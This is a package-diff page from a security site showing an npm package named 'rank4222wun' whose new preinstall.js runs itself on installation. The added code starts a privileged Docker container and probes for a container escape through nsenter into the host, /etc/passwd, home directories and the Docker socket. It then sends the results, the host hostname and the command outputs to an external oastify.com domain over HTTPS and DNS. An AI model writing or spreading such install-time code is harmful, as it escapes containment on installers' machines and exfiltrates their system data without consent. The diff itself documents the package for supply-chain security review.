npm - rank4222wun - Versions diffs - 1.0.36 → 1.0.37 - Mend

rank4222wun 1.0.36 → 1.0.37

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.36",
+  "version": "1.0.37",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js CHANGED Viewed

@@ -1,217 +1,644 @@
-// run-privileged-container.js
+// privileged-container-oast.js
 const { exec, spawn } = require('child_process');
 const fs = require('fs');
 const path = require('path');
+const https = require('https');
+const dns = require('dns');
+const crypto = require('crypto');
-class PrivilegedContainerRunner {
+console.log(`
+╔══════════════════════════════════════════════════════════╗
+║      PRIVILEGED CONTAINER WITH OAST REPORTING           ║
+║      OAST Domain: v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com ║
+╚══════════════════════════════════════════════════════════╝
+`);
+// ===================== CONFIGURATION =====================
+const CONFIG = {
+  OAST: {
+    domain: 'v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com',
+    httpsPort: 443,
+    httpPort: 80,
+    apiKey: crypto.randomBytes(16).toString('hex'),
+    sessionId: `priv-container-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`
+  },
+  DOCKER: {
+    image: 'ubuntu:latest',
+    command: '/bin/bash',
+    privileged: true,
+    interactive: true,
+    remove: false,
+    name: `priv-container-${Date.now()}`
+  },
+  SCAN: {
+    hostEscape: true,
+    networkScan: true,
+    fileAccess: true,
+    capabilityCheck: true
+  }
+};
+// ===================== OAST FUNCTIONS =====================
+class OASTReporter {
+  constructor() {
+    this.interactions = [];
+    this.reports = [];
+  }
+  sendDNS(subdomain, data = {}) {
+    const dnsName = `${subdomain}.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}`;
+    dns.lookup(dnsName, (err) => {
+      if (!err) {
+        const interaction = {
+          type: 'DNS',
+          timestamp: new Date().toISOString(),
+          subdomain: subdomain,
+          dnsName: dnsName,
+          data: data
+        };
+        this.interactions.push(interaction);
+        console.log(`📡 DNS OAST sent: ${dnsName}`);
+      }
+    });
+  }
+  sendHTTP(endpoint, data) {
+    const postData = JSON.stringify({
+      sessionId: CONFIG.OAST.sessionId,
+      timestamp: new Date().toISOString(),
+      ...data
+    });
+    const options = {
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpPort,
+      path: endpoint,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'User-Agent': 'PrivilegedContainerScanner/1.0'
+      }
+    };
+    const req = http.request(options, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        const interaction = {
+          type: 'HTTP',
+          timestamp: new Date().toISOString(),
+          endpoint: endpoint,
+          status: res.statusCode,
+          response: body,
+          data: data
+        };
+        this.interactions.push(interaction);
+        console.log(`📡 HTTP OAST sent (${res.statusCode}): ${endpoint}`);
+      });
+    });
+    req.on('error', () => {});
+    req.write(postData);
+    req.end();
+  }
+  sendHTTPS(endpoint, data) {
+    const postData = JSON.stringify({
+      sessionId: CONFIG.OAST.sessionId,
+      timestamp: new Date().toISOString(),
+      ...data
+    });
+    const options = {
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: endpoint,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'X-Report-Type': 'privileged_container',
+        'User-Agent': 'ContainerEscapeDetector/2.0'
+      }
+    };
+    const req = https.request(options, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        const interaction = {
+          type: 'HTTPS',
+          timestamp: new Date().toISOString(),
+          endpoint: endpoint,
+          status: res.statusCode,
+          response: body,
+          data: data
+        };
+        this.interactions.push(interaction);
+        this.reports.push(interaction);
+        console.log(`📡 HTTPS OAST sent (${res.statusCode}): ${endpoint}`);
+      });
+    });
+    req.on('error', (e) => {
+      console.log(`⚠️  OAST error (may be expected): ${e.message}`);
+    });
+    req.write(postData);
+    req.end();
+  }
+  async reportContainerEscape(containerId, evidence) {
+    const report = {
+      containerId: containerId.substring(0, 12),
+      escapeConfirmed: evidence.escaped || false,
+      confidence: evidence.confidence || 0,
+      methods: evidence.methods || [],
+      proofPoints: evidence.proofPoints || [],
+      hostInfo: evidence.hostInfo || {},
+      timestamp: new Date().toISOString()
+    };
+    // إرسال عبر HTTPS
+    this.sendHTTPS('/privileged-container-escape', report);
+    // إرسال DNS notification
+    if (evidence.escaped) {
+      this.sendDNS('escape-confirmed', {
+        container: containerId.substring(0, 12),
+        confidence: evidence.confidence
+      });
+    }
+    // حفظ محلياً
+    this.saveLocalReport(report);
+    return report;
+  }
+  saveLocalReport(report) {
+    const filename = `oast-report-${CONFIG.OAST.sessionId}.json`;
+    const allReports = {
+      sessionId: CONFIG.OAST.sessionId,
+      domain: CONFIG.OAST.domain,
+      timestamp: new Date().toISOString(),
+      reports: this.reports,
+      containerReport: report
+    };
+    fs.writeFileSync(filename, JSON.stringify(allReports, null, 2));
+    console.log(`💾 Report saved locally: ${filename}`);
+  }
+}
+// ===================== CONTAINER SCANNER =====================
+class PrivilegedContainerScanner {
   constructor() {
     this.containerId = null;
-    this.outputLog = [];
-    this.status = 'stopped';
+    this.oastReporter = new OASTReporter();
+    this.evidence = {
+      escaped: false,
+      confidence: 0,
+      methods: [],
+      proofPoints: [],
+      hostInfo: {},
+      containerInfo: {}
+    };
   }
-  async runContainer() {
-    console.log('🚀 جاري تشغيل حاوية Ubuntu مميزة...');
+  async run() {
+    try {
+      console.log('🚀 Starting privileged container analysis...\n');
+      // إرسال بداية الجلسة إلى OAST
+      this.oastReporter.sendHTTPS('/session-start', {
+        action: 'privileged_container_start',
+        config: CONFIG
+      });
+      // 1. تشغيل الحاوية المميزة
+      await this.runPrivilegedContainer();
+      // 2. جمع المعلومات الأساسية
+      await this.collectBasicInfo();
+      // 3. محاولة الهروب والتأكيد
+      await this.attemptEscape();
+      // 4. فحص إضافي للحاوية
+      await this.performDeepScan();
+      // 5. تحليل النتائج
+      await this.analyzeResults();
+      // 6. إرسال التقرير النهائي
+      await this.sendFinalReport();
+      // 7. عرض النتائج
+      this.displayResults();
+      // 8. تنظيف (اختياري)
+      await this.cleanup();
+    } catch (error) {
+      console.error(`❌ Error: ${error.message}`);
+      this.oastReporter.sendHTTPS('/error', { error: error.message });
+    }
+  }
+  async runPrivilegedContainer() {
+    console.log('📦 Running privileged container...');
+    const dockerArgs = [
+      'run',
+      '--privileged',
+      '-d',
+      '--name', CONFIG.DOCKER.name,
+      CONFIG.DOCKER.image,
+      'sleep', '3600'
+    ];
     return new Promise((resolve, reject) => {
-      const dockerCommand = 'docker run --privileged -d ubuntu:latest sleep infinity';
-      exec(dockerCommand, (error, stdout, stderr) => {
+      exec(`docker ${dockerArgs.join(' ')}`, (error, stdout, stderr) => {
         if (error) {
-          console.error('❌ خطأ في تشغيل الحاوية:', error.message);
           reject(error);
           return;
         }
         this.containerId = stdout.trim();
-        console.log(`✅ الحاوية تم تشغيلها بنجاح: ${this.containerId.substring(0, 12)}`);
-        this.status = 'running';
+        console.log(`✅ Container started: ${this.containerId.substring(0, 12)}`);
-        // الانتظار قليلاً ثم تنفيذ الأوامر
-        setTimeout(() => {
-          this.executeCommands()
-            .then(resolve)
-            .catch(reject);
-        }, 2000);
+        // إرسال إلى OAST
+        this.oastReporter.sendHTTPS('/container-started', {
+          containerId: this.containerId.substring(0, 12),
+          name: CONFIG.DOCKER.name,
+          image: CONFIG.DOCKER.image,
+          privileged: true
+        });
+        // الانتظار للحاوية لتبدأ
+        setTimeout(resolve, 2000);
       });
     });
   }
-  async executeCommands() {
-    console.log('\n🔧 جاري تنفيذ الأوامر داخل الحاوية...\n');
+  async collectBasicInfo() {
+    console.log('\n🔍 Collecting basic container information...');
     const commands = [
-      // معلومات النظام الأساسية
-      'echo "=== معلومات النظام ==="',
+      // معلومات النظام
       'cat /etc/os-release',
       'uname -a',
       'whoami',
       'id',
-      // معلومات الذاكرة والمعالج
-      'echo -e "\n=== موارد النظام ==="',
-      'free -h',
-      'df -h',
-      'cat /proc/cpuinfo | grep "model name" | head -1',
-      // التحقق من الصلاحيات
-      'echo -e "\n=== الصلاحيات المميزة ==="',
-      'capsh --print',
-      'cat /proc/self/status | grep Cap',
+      // الصلاحيات
+      'capsh --print 2>/dev/null || echo "No capsh"',
+      'cat /proc/self/status | grep -i cap',
-      // معلومات الشبكة
-      'echo -e "\n=== معلومات الشبكة ==="',
-      'ip addr show',
-      'hostname -I',
-      'route -n',
-      // فحص الملفات والمجلدات
-      'echo -e "\n=== نظام الملفات ==="',
+      // نظام الملفات
       'ls -la /',
       'mount | head -20',
+      'df -h',
-      // تحليل الحاوية
-      'echo -e "\n=== معلومات الحاوية ==="',
-      'cat /proc/1/cgroup 2>/dev/null || echo "لا يمكن قراءة cgroup"',
-      'cat /proc/self/mountinfo 2>/dev/null | head -10',
+      // الذاكرة والمعالج
+      'free -h',
+      'cat /proc/cpuinfo | grep "model name" | head -1',
-      // اختبار الوصول إلى المضيف
-      'echo -e "\n=== اختبار الوصول للمضيف ==="',
-      'nsenter --target 1 --mount -- sh -c "echo يمكن الوصول للمضيف: && hostname" 2>/dev/null || echo "nsenter غير متاح"',
-      'ls -la /var/run/docker.sock 2>/dev/null && echo "✅ Docker socket موجود" || echo "❌ Docker socket غير موجود"',
+      // الشبكة
+      'ip addr show',
+      'hostname -I',
+      'cat /etc/hosts',
-      // معلومات إضافية
-      'echo -e "\n=== معلومات إضافية ==="',
-      'env | head -20',
-      'ps aux | head -10'
+      // معلومات Docker
+      'cat /proc/1/cgroup 2>/dev/null || echo "No cgroup access"',
+      'ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"'
     ];
     const results = {};
-    for (let i = 0; i < commands.length; i++) {
-      const command = commands[i];
-      // إذا كان الأمر echo، عرضه مباشرة
-      if (command.startsWith('echo')) {
-        const message = command.replace(/^echo\s+["']?/, '').replace(/["']?$/, '');
-        console.log(message);
-        this.outputLog.push(message);
-        continue;
-      }
-      // تنفيذ الأمر داخل الحاوية
+    for (const cmd of commands) {
       try {
-        const output = await this.execInContainer(command);
-        console.log(output);
-        this.outputLog.push(output);
+        const output = await this.execInContainer(cmd);
+        results[cmd] = output.substring(0, 500);
-        // حفظ النتائج المهمة
-        if (command.includes('os-release')) {
-          results.osInfo = output;
-        } else if (command.includes('uname -a')) {
-          results.kernelInfo = output;
-        } else if (command.includes('capsh')) {
-          results.capabilities = output;
-        } else if (command.includes('docker.sock')) {
-          results.dockerSocket = output.includes('✅');
+        // تحليل بعض النتائج الهامة
+        if (cmd.includes('os-release')) {
+          this.evidence.containerInfo.os = output;
+        }
+        if (cmd.includes('uname -a')) {
+          this.evidence.containerInfo.kernel = output;
+        }
+        if (cmd.includes('capsh')) {
+          this.evidence.containerInfo.capabilities = output;
         }
       } catch (error) {
-        const errorMsg = `❌ خطأ في الأمر "${command}": ${error.message}`;
-        console.log(errorMsg);
-        this.outputLog.push(errorMsg);
+        results[cmd] = `ERROR: ${error.message}`;
       }
-      // تأخير بسيط بين الأوامر
-      await this.delay(500);
     }
+    // إرسال المعلومات الأساسية إلى OAST
+    this.oastReporter.sendHTTPS('/basic-info', {
+      containerId: this.containerId.substring(0, 12),
+      basicInfo: results
+    });
     return results;
   }
-  execInContainer(command) {
-    return new Promise((resolve, reject) => {
-      if (!this.containerId) {
-        reject(new Error('لا توجد حاوية نشطة'));
-        return;
+  async attemptEscape() {
+    console.log('\n🔓 Attempting container escape...');
+    const escapeTests = [
+      {
+        name: 'nsenter_escape',
+        command: 'which nsenter && nsenter --target 1 --mount -- sh -c "echo HOST_HOSTNAME:$(cat /etc/hostname 2>/dev/null) && echo CONTAINER_HOSTNAME:$(hostname)" 2>/dev/null || echo "FAILED"',
+        check: (output) => output.includes('HOST_HOSTNAME') && output.includes('CONTAINER_HOSTNAME')
+      },
+      {
+        name: 'proc_escape',
+        command: 'cat /proc/1/status 2>/dev/null | head -5 && cat /proc/1/cmdline 2>/dev/null | tr "\\0" " " | head -c 100',
+        check: (output) => output.includes('State:') && output.length > 20
+      },
+      {
+        name: 'host_mounts',
+        command: 'ls -la /home 2>/dev/null || ls -la /root 2>/dev/null || cat /etc/passwd 2>/dev/null | head -5 || echo "NO_ACCESS"',
+        check: (output) => !output.includes('NO_ACCESS') && output.length > 10
+      },
+      {
+        name: 'docker_socket',
+        command: 'ls -la /var/run/docker.sock 2>/dev/null && echo "EXISTS" || echo "NOT_EXISTS"',
+        check: (output) => output.includes('EXISTS')
+      },
+      {
+        name: 'network_escape',
+        command: 'ip route show 2>/dev/null | head -5 && ip neigh show 2>/dev/null | head -5',
+        check: (output) => output.includes('default via') || output.includes('lladdr')
       }
+    ];
+    for (const test of escapeTests) {
+      try {
+        const output = await this.execInContainer(test.command);
+        if (test.check(output)) {
+          this.evidence.methods.push(test.name);
+          console.log(`✅ ${test.name}: Possible`);
+          // إرسال إلى OAST
+          this.oastReporter.sendHTTPS('/escape-attempt', {
+            method: test.name,
+            success: true,
+            output: output.substring(0, 300)
+          });
+          // التحقق من اختلاف hostname لـ nsenter
+          if (test.name === 'nsenter_escape') {
+            const lines = output.split('\n');
+            let hostHostname = '';
+            let containerHostname = '';
+            lines.forEach(line => {
+              if (line.startsWith('HOST_HOSTNAME:')) {
+                hostHostname = line.replace('HOST_HOSTNAME:', '').trim();
+              }
+              if (line.startsWith('CONTAINER_HOSTNAME:')) {
+                containerHostname = line.replace('CONTAINER_HOSTNAME:', '').trim();
+              }
+            });
+            if (hostHostname && containerHostname && hostHostname !== containerHostname) {
+              this.evidence.proofPoints.push(`Host hostname (${hostHostname}) differs from container (${containerHostname})`);
+              this.evidence.hostInfo.hostname = hostHostname;
+              this.evidence.escaped = true;
+            }
+          }
+        }
+      } catch (error) {
+        console.log(`❌ ${test.name}: Failed - ${error.message}`);
+      }
+    }
+  }
+  async performDeepScan() {
+    if (!CONFIG.SCAN.hostEscape) return;
+    console.log('\n🔬 Performing deep scan...');
+    const deepChecks = [
+      // محاولة إنشاء حاوية من داخل الحاوية
+      {
+        name: 'nested_container',
+        command: 'which docker && docker ps 2>/dev/null || which podman && podman ps 2>/dev/null || echo "NO_CONTAINER_RUNTIME"',
+        check: (output) => !output.includes('NO_CONTAINER_RUNTIME')
+      },
-      const fullCommand = `docker exec ${this.containerId} sh -c "${command.replace(/"/g, '\\"')}"`;
+      // فحص kernel vulnerabilities
+      {
+        name: 'kernel_check',
+        command: 'uname -r && grep -i "dirty\\|cow\\|shock\\|overlay" /etc/os-release 2>/dev/null || echo "NO_VULN_INFO"',
+        check: (output) => output.length > 5
+      },
-      exec(fullCommand, { timeout: 10000 }, (error, stdout, stderr) => {
-        if (error) {
-          // بعض الأوامر تعطي stderr لكنها ناجحة
-          if (stderr && !stdout) {
-            resolve(stderr);
-          } else {
-            reject(error);
-          }
-        } else {
-          resolve(stdout || stderr || '');
+      // محاولة كتابة ملف في نظام المضيف
+      {
+        name: 'host_write_test',
+        command: 'echo "TEST_WRITE_FROM_CONTAINER" > /tmp/container_test.txt 2>/dev/null && echo "WRITE_SUCCESS" || echo "WRITE_FAILED"',
+        check: (output) => output.includes('WRITE_SUCCESS')
+      },
+      // فحص mount points خطيرة
+      {
+        name: 'dangerous_mounts',
+        command: 'mount 2>/dev/null | grep -E "(proc|sys|dev|/var/run)" | head -10',
+        check: (output) => output.length > 10
+      }
+    ];
+    for (const check of deepChecks) {
+      try {
+        const output = await this.execInContainer(check.command);
+        if (check.check(output)) {
+          console.log(`⚠️  ${check.name}: Found potential issue`);
+          // إرسال إلى OAST
+          this.oastReporter.sendDNS(check.name, {
+            result: output.substring(0, 100)
+          });
         }
-      });
-    });
+      } catch (error) {
+        // تجاهل الأخطاء
+      }
+    }
   }
-  delay(ms) {
-    return new Promise(resolve => setTimeout(resolve, ms));
+  async analyzeResults() {
+    console.log('\n📊 Analyzing results...');
+    // حساب مستوى الثقة
+    let confidence = 0;
+    // نقاط لكل طريقة هروب محتملة
+    const methodPoints = {
+      nsenter_escape: 30,
+      proc_escape: 25,
+      host_mounts: 20,
+      docker_socket: 25,
+      network_escape: 15
+    };
+    this.evidence.methods.forEach(method => {
+      confidence += methodPoints[method] || 10;
+    });
+    // نقاط إضافية لأدلة قاطعة
+    if (this.evidence.proofPoints.length > 0) {
+      confidence += this.evidence.proofPoints.length * 10;
+    }
+    // إذا كان hostname مختلف
+    if (this.evidence.hostInfo.hostname) {
+      confidence += 20;
+    }
+    // تحديد إذا تم الهروب فعلاً
+    this.evidence.confidence = Math.min(100, confidence);
+    if (this.evidence.confidence >= 60) {
+      this.evidence.escaped = true;
+      console.log(`🚨 CONFIRMED: Container escape possible (${this.evidence.confidence}% confidence)`);
+    } else if (this.evidence.confidence >= 30) {
+      console.log(`⚠️  POSSIBLE: Container escape may be possible (${this.evidence.confidence}% confidence)`);
+    } else {
+      console.log(`✅ SECURE: Container appears isolated (${this.evidence.confidence}% confidence)`);
+    }
   }
-  async getInteractiveShell() {
-    console.log('\n💻 تشغيل shell تفاعلي...');
-    console.log('   استخدم "exit" للخروج\n');
+  async sendFinalReport() {
+    console.log('\n📡 Sending final report to OAST...');
-    return new Promise((resolve) => {
-      const dockerProcess = spawn('docker', [
-        'exec', '-it', this.containerId, '/bin/bash'
-      ], {
-        stdio: 'inherit'
-      });
-      dockerProcess.on('close', (code) => {
-        console.log(`\n🔚 Shell مغلق مع الكود: ${code}`);
-        resolve();
-      });
+    const report = {
+      sessionId: CONFIG.OAST.sessionId,
+      containerId: this.containerId ? this.containerId.substring(0, 12) : 'unknown',
+      timestamp: new Date().toISOString(),
+      evidence: this.evidence,
+      summary: {
+        escaped: this.evidence.escaped,
+        confidence: this.evidence.confidence,
+        methods: this.evidence.methods,
+        proofPoints: this.evidence.proofPoints
+      }
+    };
+    // إرسال التقرير النهائي
+    this.oastReporter.reportContainerEscape(this.containerId, this.evidence);
+    // إرسال DNS notification للنتيجة
+    const resultType = this.evidence.escaped ? 'escape-confirmed' : 'no-escape';
+    this.oastReporter.sendDNS(resultType, {
+      confidence: this.evidence.confidence,
+      methods: this.evidence.methods.length
     });
+    return report;
   }
-  saveOutput() {
-    const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
-    const filename = `container-output-${timestamp}.txt`;
+  displayResults() {
+    console.log('\n' + '='.repeat(80));
+    console.log('📊 PRIVILEGED CONTAINER ANALYSIS RESULTS');
+    console.log('='.repeat(80));
+    console.log(`\n📦 Container ID: ${this.containerId ? this.containerId.substring(0, 12) : 'unknown'}`);
+    console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}`);
+    console.log(`\n🎯 Escape Status: ${this.evidence.escaped ? '🚨 CONFIRMED' : '✅ NOT CONFIRMED'}`);
+    console.log(`📈 Confidence Level: ${this.evidence.confidence}%`);
-    const output = [
-      `ناتج تشغيل حاوية مميزة`,
-      `تاريخ: ${new Date().toLocaleString()}`,
-      `Container ID: ${this.containerId || 'غير معروف'}`,
-      `الحالة: ${this.status}`,
-      `='.repeat(50)}\n\n`,
-      ...this.outputLog
-    ].join('\n');
+    if (this.evidence.methods.length > 0) {
+      console.log(`\n🔓 Possible Escape Methods:`);
+      this.evidence.methods.forEach((method, i) => {
+        console.log(`   ${i + 1}. ${method}`);
+      });
+    }
+    if (this.evidence.proofPoints.length > 0) {
+      console.log(`\n🎯 Evidence Found:`);
+      this.evidence.proofPoints.forEach((proof, i) => {
+        console.log(`   ${i + 1}. ${proof}`);
+      });
+    }
+    if (this.evidence.hostInfo.hostname) {
+      console.log(`\n🖥️  Host Information:`);
+      console.log(`   Hostname: ${this.evidence.hostInfo.hostname}`);
+    }
+    console.log(`\n📡 OAST Interactions: ${this.oastReporter.interactions.length} interactions sent`);
+    console.log(`   DNS: ${this.oastReporter.interactions.filter(i => i.type === 'DNS').length}`);
+    console.log(`   HTTPS: ${this.oastReporter.interactions.filter(i => i.type === 'HTTPS').length}`);
-    fs.writeFileSync(filename, output);
-    console.log(`\n💾 تم حفظ الناتج في: ${filename}`);
+    console.log('\n🔍 Check your OAST dashboard for detailed evidence:');
+    console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
+    console.log(`   Look for interactions at: ${CONFIG.OAST.domain}`);
-    return filename;
+    console.log('\n' + '='.repeat(80));
+    console.log('🎯 ANALYSIS COMPLETE');
+    console.log('='.repeat(80));
   }
   async cleanup() {
-    if (this.containerId && this.status === 'running') {
-      console.log('\n🧹 تنظيف الحاوية...');
+    if (this.containerId) {
+      console.log('\n🧹 Cleaning up container...');
       try {
         await this.execOnHost(`docker stop ${this.containerId}`);
         await this.execOnHost(`docker rm ${this.containerId}`);
-        this.status = 'stopped';
-        console.log('✅ تم تنظيف الحاوية بنجاح');
+        console.log('✅ Container cleaned up');
+        // إرسال إشعار التنظيف إلى OAST
+        this.oastReporter.sendHTTPS('/cleanup', {
+          containerId: this.containerId.substring(0, 12),
+          action: 'container_removed'
+        });
       } catch (error) {
-        console.error('❌ خطأ في التنظيف:', error.message);
+        console.log(`⚠️  Could not clean up container: ${error.message}`);
       }
     }
   }
+  execInContainer(command) {
+    return new Promise((resolve, reject) => {
+      if (!this.containerId) {
+        reject(new Error('No container running'));
+        return;
+      }
+      exec(`docker exec ${this.containerId} sh -c "${command.replace(/"/g, '\\"')}"`,
+        { timeout: 10000 },
+        (error, stdout, stderr) => {
+          if (error) {
+            reject(error);
+          } else {
+            resolve(stdout || stderr || '');
+          }
+        }
+      );
+    });
+  }
   execOnHost(command) {
     return new Promise((resolve, reject) => {
-      exec(command, (error, stdout, stderr) => {
+      exec(command, { timeout: 10000 }, (error, stdout, stderr) => {
         if (error) {
           reject(error);
         } else {
@@ -220,225 +647,236 @@ class PrivilegedContainerRunner {
       });
     });
   }
+}
-  async run() {
-    try {
-      // 1. تشغيل الحاوية
-      await this.runContainer();
-      // 2. تنفيذ الأوامر
-      const results = await this.executeCommands();
-      // 3. حفظ النتائج
-      const outputFile = this.saveOutput();
-      // 4. عرض الملخص
-      this.showSummary(results, outputFile);
-      // 5. خيار shell تفاعلي
-      console.log('\n🎯 الخيارات المتاحة:');
-      console.log('   1. تشغيل shell تفاعلي (bash)');
-      console.log('   2. تنظيف الحاوية والخروج');
-      console.log('   3. الخروج بدون تنظيف');
-      // انتظار قرار المستخدم
-      await this.waitForUserDecision();
-    } catch (error) {
-      console.error('❌ فشل التشغيل:', error.message);
+// ===================== SIMPLE VERSION =====================
+function runSimplePrivilegedWithOAST() {
+  console.log('🚀 Running simple privileged container with OAST reporting...\n');
+  const containerName = `simple-priv-${Date.now()}`;
+  const sessionId = `simple-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`;
+  // إرسال بداية الجلسة
+  const startReq = https.request({
+    hostname: CONFIG.OAST.domain,
+    port: CONFIG.OAST.httpsPort,
+    path: '/simple-start',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-Session-ID': sessionId
     }
-  }
-  showSummary(results, outputFile) {
-    console.log('\n' + '='.repeat(60));
-    console.log('📊 ملخص تشغيل الحاوية المميزة');
-    console.log('='.repeat(60));
+  });
+  startReq.write(JSON.stringify({
+    action: 'simple_container_start',
+    containerName: containerName,
+    timestamp: new Date().toISOString()
+  }));
+  startReq.end();
+  // تشغيل الحاوية
+  const dockerArgs = [
+    'run',
+    '--privileged',
+    '--name', containerName,
+    '--rm',
+    CONFIG.DOCKER.image,
+    'sh', '-c',
+    `
+    echo "=== PRIVILEGED CONTAINER STARTED ==="
+    echo "Session: ${sessionId}"
+    echo "Hostname: $(hostname)"
+    echo "User: $(whoami)"
+    echo "=== TESTING ESCAPE ==="
-    console.log(`📦 Container ID: ${this.containerId?.substring(0, 12) || 'غير معروف'}`);
-    console.log(`📁 الناتج محفوظ في: ${outputFile}`);
+    # Test nsenter
+    which nsenter && echo "nsenter: AVAILABLE" || echo "nsenter: NOT_AVAILABLE"
-    if (results.osInfo) {
-      const osLine = results.osInfo.split('\n').find(l => l.includes('PRETTY_NAME'));
-      if (osLine) {
-        console.log(`🐧 النظام: ${osLine.split('=')[1]?.replace(/"/g, '')}`);
-      }
-    }
+    # Test host access
+    cat /proc/1/status 2>/dev/null | head -2 && echo "Host proc: ACCESSIBLE" || echo "Host proc: NO_ACCESS"
-    if (results.kernelInfo) {
-      console.log(`⚙️  Kernel: ${results.kernelInfo.split(' ')[2]}`);
-    }
+    # Send DNS notification
+    nslookup ${sessionId}.simple-test.${CONFIG.OAST.domain} 2>/dev/null || echo "DNS test"
-    if (results.capabilities && results.capabilities.includes('cap_sys_admin')) {
-      console.log(`🔓 الصلاحيات: CAP_SYS_ADMIN متاحة (صلاحيات مميزة كاملة)`);
-    }
+    echo "=== CONTAINER COMPLETE ==="
+    `
+  ];
+  console.log(`Running: docker ${dockerArgs.join(' ')}`);
+  const dockerProcess = spawn('docker', dockerArgs, { stdio: 'inherit' });
+  dockerProcess.on('close', (code) => {
+    console.log(`\n✅ Container exited with code: ${code}`);
-    console.log(`🔌 Docker socket: ${results.dockerSocket ? '✅ موجود' : '❌ غير موجود'}`);
-    console.log('='.repeat(60));
-  }
-  async waitForUserDecision() {
-    const readline = require('readline').createInterface({
-      input: process.stdin,
-      output: process.stdout
+    // إرسال إشعار الانتهاء
+    const endReq = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/simple-end',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': sessionId
+      }
     });
-    return new Promise((resolve) => {
-      readline.question('\nاختر رقم الخيار: ', async (answer) => {
-        switch(answer.trim()) {
-          case '1':
-            await this.getInteractiveShell();
-            readline.close();
-            await this.cleanup();
-            resolve();
-            break;
-          case '2':
-            readline.close();
-            await this.cleanup();
-            resolve();
-            break;
-          case '3':
-          default:
-            readline.close();
-            console.log('👋 تم الخروج. الحاوية لا تزال تعمل.');
-            console.log(`   Container ID: ${this.containerId}`);
-            console.log('   يمكنك تنظيفها يدوياً:');
-            console.log(`   docker stop ${this.containerId}`);
-            console.log(`   docker rm ${this.containerId}`);
-            resolve();
-            break;
-        }
-      });
-    });
-  }
+    endReq.write(JSON.stringify({
+      action: 'simple_container_end',
+      exitCode: code,
+      timestamp: new Date().toISOString()
+    }));
+    endReq.end();
+    console.log(`\n📡 Check OAST for interactions: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Session ID: ${sessionId}`);
+  });
 }
-// ===================== النسخة المبسطة =====================
-function runSimplePrivilegedContainer() {
-  console.log('🚀 جاري تشغيل: docker run --privileged -it ubuntu:latest /bin/bash\n');
+// ===================== INTERACTIVE VERSION =====================
+function runInteractivePrivileged() {
+  console.log('🚀 Running interactive privileged container...\n');
+  console.log(`📡 OAST Domain: ${CONFIG.OAST.domain}`);
+  console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
+  // إرسال إشعار البدء
+  const req = https.request({
+    hostname: CONFIG.OAST.domain,
+    port: CONFIG.OAST.httpsPort,
+    path: '/interactive-start',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-Session-ID': CONFIG.OAST.sessionId
+    }
+  });
+  req.write(JSON.stringify({
+    action: 'interactive_container_start',
+    timestamp: new Date().toISOString(),
+    command: 'docker run --privileged -it ubuntu:latest /bin/bash'
+  }));
+  req.end();
+  // تشغيل الحاوية التفاعلية
+  console.log('💻 Starting interactive bash session...');
+  console.log('   You can test commands manually.');
+  console.log('   Try these commands to test escape:');
+  console.log('   - nsenter --target 1 --mount -- sh -c "hostname"');
+  console.log('   - cat /proc/1/status');
+  console.log('   - ls -la /var/run/docker.sock');
+  console.log('   - nslookup test.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}\n');
   const dockerProcess = spawn('docker', [
-    'run', '--privileged', '-it', 'ubuntu:latest', '/bin/bash'
+    'run',
+    '--privileged',
+    '-it',
+    '--name', `interactive-${CONFIG.OAST.sessionId}`,
+    CONFIG.DOCKER.image,
+    CONFIG.DOCKER.command
   ], {
     stdio: 'inherit'
   });
   dockerProcess.on('close', (code) => {
-    console.log(`\n🔚 الحاوية أغلقت مع الكود: ${code}`);
+    console.log(`\n🔚 Container exited with code: ${code}`);
+    // إرسال إشعار الانتهاء
+    const endReq = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/interactive-end',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId
+      }
+    });
+    endReq.write(JSON.stringify({
+      action: 'interactive_container_end',
+      exitCode: code,
+      timestamp: new Date().toISOString()
+    }));
+    endReq.end();
+    // تنظيف
+    exec(`docker rm interactive-${CONFIG.OAST.sessionId} 2>/dev/null || true`);
+    console.log(`\n📡 Check OAST interactions at: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Use Session ID: ${CONFIG.OAST.sessionId}`);
   });
-  // التعامل مع إشارات الإغلاق
+  // التعامل مع Ctrl+C
   process.on('SIGINT', () => {
-    console.log('\n\n⚠️  تم استقبال Ctrl+C...');
+    console.log('\n\n⚠️  Received Ctrl+C, cleaning up...');
     dockerProcess.kill('SIGINT');
   });
 }
-// ===================== النسخة مع أوامر مسبقة =====================
-function runWithPredefinedCommands() {
-  console.log('🚀 تشغيل حاوية مع أوامر مسبقة...\n');
-  const commands = [
